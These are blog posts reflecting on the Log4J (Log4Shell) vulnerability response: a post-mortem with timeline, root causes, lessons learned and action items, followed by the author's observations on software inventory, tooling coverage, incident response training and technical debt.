Post Mortem on Log4J

Post Mortem on Log4J

Originally published on the Bright Security Blog. Go check it out!

The purpose of any post mortem is to look into the past in order to find ways to prevent similar issues from happening again, and also to improve upon our responses to issues found in the future. It is not to blame others, point fingers, or punish. A proper post mortem states facts, including what went well and what did not, and issues ideas for improvements going forward.

Short rehash: log4j is a popular java library used for application logging. On November 26, 2021, a vulnerability was discovered in it that allowed any attacker to paste a short string of characters into the address bar, and if vulnerable, the attacker would gain remote code execution (RCE) access to the web server. No authentication to the system was required, making this the simplest attack of all time to gain RCE (the highest possible level of privilege) on a victim’s system.


Points of interest and timeline:

  • This vulnerability was recorded in the CVE database on Friday, November 26, 2021, but was not weaponized until December 9, 2021.
  • This vulnerability is often referred to as #Log4Shell.
  • Log4j can only be found in software using java and/or jar files,
  • Non-java languages and frameworks were not affected: log4Net, log4Js, etc.
  • Both custom software (made in house) and COTS (configurable off the shelf) software was affected, including popular platforms that are household names.
  • Many pieces of software call other pieces of software, including log4j, and thus were vulnerable, despite not seeming to be a problem at first glance .
  • Several servers with middleware (due to the library running inside them) were vulnerable to log4j.
  • The CVE is named CVE-2021-44228
  • Log4j versions Log4j 2.0 – 2.14.x were vulnerable
  • A patch, Log4j 2.15 was released on December 16th, and almost immediately a vulnerability (CVE 2021-45046) was found in it that allowed denial of service attacks.
  • Another patch, Log4j 2.16, which was also deemed vulnerable
  • December 17th, a 3rd vulnerability in log4j was released, CVE-2021-45105
  • On December 28th Checkmarx released another vulnerability (CVE-2021-44832) within log4j, but it required that the user already have control over the configuration, meaning the system had already been breached, meaning it was not nearly as serious as previously reported vulnerabilities.
  • Version 2.17.2 is widely considered the safest version of this library.
  • Log4J 1.x was no longer supported as of 2015, and while all 1.x versions have several vulnerabilities, all were immune to this one exploit.

As soon as the alert came out, our industry acted. Incident responders immediately started contacting vendors, monitoring networks, researching, and contacting peers for more ideas. Application security teams worked with software developers to find out if any of their custom code had the affected libraries. CISOs started issuing statements to the media. And the entire industry waited for a patch to be released.

What was the root cause of this situation?

A very large percentage of all the applications in the world contain at least some open-source components, which generally have little-to-no budget for security activities, including security testing and code review. On top of this, even for-profit organizations that create software often have anywhere from acceptable to abysmal security assurance processes for the products and components they release. The part of our industry that is responsible for the security of software, often known as application security, is failing.

Key points:

  • Little-to-no financial support for open-source software means there is usually no budget for security.
  • Due to not enough qualified people in the field of application security, it is extraordinarily expensive to engage a skilled expert to do this work.
  • No regulation or laws controlling or addressing security in IT systems in most countries means this industry runs without governmental influence or regulation.
  • Although there are some groups (such as NIST and OWASP), trying to create helpful frameworks for software creators to work within, there is no mandate for any person or organization to do so.
  • The security of software is not taught in most colleges, universities, or boot camps, meaning we are graduating new software engineers who do not know how to create secure applications, test applications for security, or recognize and correct many of the security issues they may encounter.
  • Education for software security is extremely expensive in the Westernized world, pricing it out of reach for most software developers and even organizations.

Impact/Damage/Cost?

Due to companies not sharing information, it is impossible to state specifics in this category. That said, after speaking to a few sources who wish to remain anonymous, the following is likely true:

  • Damages are estimated in the hundreds of millions, for the industry world-wide.
  • Hundreds of thousands of hours of logged overtime, most likely resulting in or contributing to incident responder employee burnout.
  • Many organizations only applied this one patch and went back to business as usual. That said, some used this situation as an opportunity to create projects to simplify the patching process and/or the software release process, to ensure faster reaction times in the future.
  • Many companies that previously did not think supply chain security was important have updated their views, and hopefully also their toolset and processes.
  • When unable to create an accurate cost estimate, ‘guesstimates’ are often accepted.

Time to Detection?

  • Most companies (according to anonymous sources and online discussion) spent 2-3 straight weeks working on this issue, dropping all other priorities for the InfoSec teams and most other priorities for those applying patches and scanning.
  • Detection in 3rd party applications and SaaS was extremely difficult, as many organizations issued statements that they were unaffected, only to find out later they had been incorrect/uninformed.
  • Generally, most incident response teams responded the day-of the announcement.

Response Taken?

  • AppSec teams checked their SCA tools and code repositories for the offending library and asked for patches/upgrades where necessary.
  • CDNs, WAFs and RASPs were updated with blocking rules.
  • Those managing servers searched dependencies and patched, feverishly.
  • Those managing operating systems, middleware and SaaS wrote vendors to ask for status reports.
  • Incident responders managed all activities, often leading the search efforts.

Lessons Learned? Opportunities for Improvement?

What follows are the author’s ideals for lessons learned. Each organization is different, but below is a list of potential lessons learned by any organization.

  • Patching processes for operating systems, middleware, configurable off the shelf software (COTS), and custom software must be improved. This is the main threat to organizations from this type of vulnerability, slow updates/upgrades/patches that leave organizations open to compromise for extended periods of time.
  • Incomplete inventory of software assets is a large threat to any business, we cannot protect what we do not know we have. This includes a software bill of materials (SBOM). Software asset inventory must be prioritized.
  • Organizations that learned later, rather than earlier, about this vulnerability were at a distinct disadvantage. Subscribing to various threat intelligence and bug alert feeds is mandatory for any large enterprise.
  • Many Incident Response teams and processes did not have caveats for software vulnerabilities. Updating incident response processes and team training to include this type of threat is mandatory for medium to large organizations.
  • Most service level agreements (SLAs) did not cover such a situation and updating these with current vendors would be a ‘nice to have’ for future, similar, situations. Adding this to vendor questions in the future would be an excellent negotiation point.
  • Many custom software departments were unprepared to find which applications did and did not contain this library. Besides creating SBOMS and inventory, deploying a software composition analysis tool to monitor custom applications and their dependencies would have simplified this situation for any dev department.
  • Many organizations with extensive technical debt found themselves in a situation where it would require a re-architecting of their application(s) in order to upgrade off of the offending library. Addressing deep technical debt is paramount in building the ability to respond to dependency-related vulnerability of this magnitude.
  • There are hundreds of thousands of open-source libraries all over the internet, littered with both known and unknown vulnerabilities. This problem is not new, but this specific situation has brought this issue into the public eye in a way that previous vulnerabilities have not.  Our industry and/or governments must do something to ensure the safety and security of these open-source components that software creators around the world use every day. The current system is not safe nor reliable.

What went well?

  • Incident response teams worked quickly and diligently to triage, respond to, and eradicate this issue.
  • Operational and software teams responsible for patching and upgrading systems performed heroically, in many organizations.
  • Multiple vendors went above and beyond in assisting their customers and the public responded quickly and completely to this issue.

What could have gone better?

  • Messaging was confused at times, as few knew the extent of this issue at first.
  • The media released many articles that emphasized fear, uncertainty, and doubt (FUD), rather than helpful facts, creating panic when it was not necessary.
  • Companies that produce customer software, but who did not have application security resources, were left at a distinct disadvantage, unaware of what to do for the first few days (before articles with explicit instructions were available).
  • Many vendors issued statements that were just not true. “Our product could have stopped this” and “you would have known before everyone else if you had just bought us”, etc. Although there are some products that may have been able to block such an attack without additional configurations, they were few and far between compared to the number of vendors claiming this to be true of their own product(s).

Action Items

  • Improve infrastructure, middleware, and COTS patching and testing processes.
  • Improve custom software release processes.
  • Request Software Bill of Materials (SBOMs) for all software, including purchased products and those which are home-grown.
  • Create a software asset inventory and create processes to ensure it continues to be up to date. This should include SBOM information.
  • Subscribe to threat feeds and bug alerts for all products you own, as well as programming languages and frameworks used internally.
  • Train your incident response team and/or AppSec team to respond to software-related security incidents.
  • For companies that build custom software: Install a software composition analysis tool and connect it to 100% of your code repos. Take the feedback from this tool seriously and update your dependencies accordingly.
  • Negotiate SBOMs and Service Level Agreements (SLAs) on patching for all new COTS and middleware products your organization purchases. Attempt to negotiate these after the fact for contracts you already have in place.
  • Do your best to keep your dependencies reasonably up to date and address technical debt in a reasonable way. If your entire application needs to be re-architected just to update a single dependency to current, this means your technical debt is currently unacceptable. Make time for maintenance now, rather than waiting for it to “make time for you”, later.
  • Create a process for evaluating and approving of all dependencies used in custom software, not just open-source ones. A software composition analysis tool can help with both an implementation and documentation point of view.

Focus questions:

Could we have known about this sooner?

The very frustrating question the incident responders have been asked over and over again since this happened, is could we have known about this sooner? And the answer, unfortunately, is probably not. Not with the way we, as an industry, treat open-source software.

Could we have responded better?

This is a question only your organization can answer for itself. That said, reviewing the ‘Lessons Learned’ section and implementing one or more of the ‘Action Items’ in this article could certainly help.

How can we stop this from happening again?

Our industry needs to change the way we manage open-source libraries and other 3d party components. This is not something the author can answer, as a single person. This is something the industry must push for to implement real and lasting change. One person is not enough.

Conclusion

It is likely that much of our industry will remain unchanged from this major security incident. That said, it is the author’s hope that some organizations and individuals changed for the better, prioritizing fast and effective patching and upgrading processes, and the repayment of technical debt, setting themselves apart from others as leaders in this field.

Why can’t I get over log4j?

Image of Tanya Janca

I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved (one company estimated 100 weeks of work, completed over the course of 8 days of time) in the response was spectacular, and the damage caused is still unknown at this point. We will likely never know the true extend of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect story telling experience you are used to here, bear with me, please.

Short rehash: log4j is a popular java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar, and if vulnerable, the user would have remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased my multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool ) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard several vendors have their customers demand “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore it’s not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had WAF, RASP, or CNDs were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few company’s bacon and reduced the risk greatly.

I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that it is a vulnerability in itself. Log4j proved this, as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly, this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Discoveries as a Result of the Log4j Debacle

Me, pre-log4j
Tanya making a silly face.
Happier times, before I knew anything about log4j.

Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4J java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

​Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I already posted in my newsletter, on this blog and my youtube channel , I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including Web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams who I admire. If they find it hard, how can smaller companies with fewer resources get it done? When responding to this incident this problem has never been more obvious.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

​Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of; GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • SVN, ClearCase, SourceSafe, subversion and other repos I thought no one was using anymore… That are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code is kept, meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.

Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know you’re assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most-talked about throughout this situation. The question posed is most-often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS), that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access or has access but the incorrect set of rights? There are dozens are reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?

Lack of Incident Response/Investigation Training

Many people I spoke to who are part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, having no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had near as much training as I would like, with most of what I have learned being from on the job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery network) like CloudFlare, behind a WAF (Web Application Firewall) or a RASP (Run-Time Application Security Protection).

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call “Ancient Dependencies”; dependencies so old that the application would requiring re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4J is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.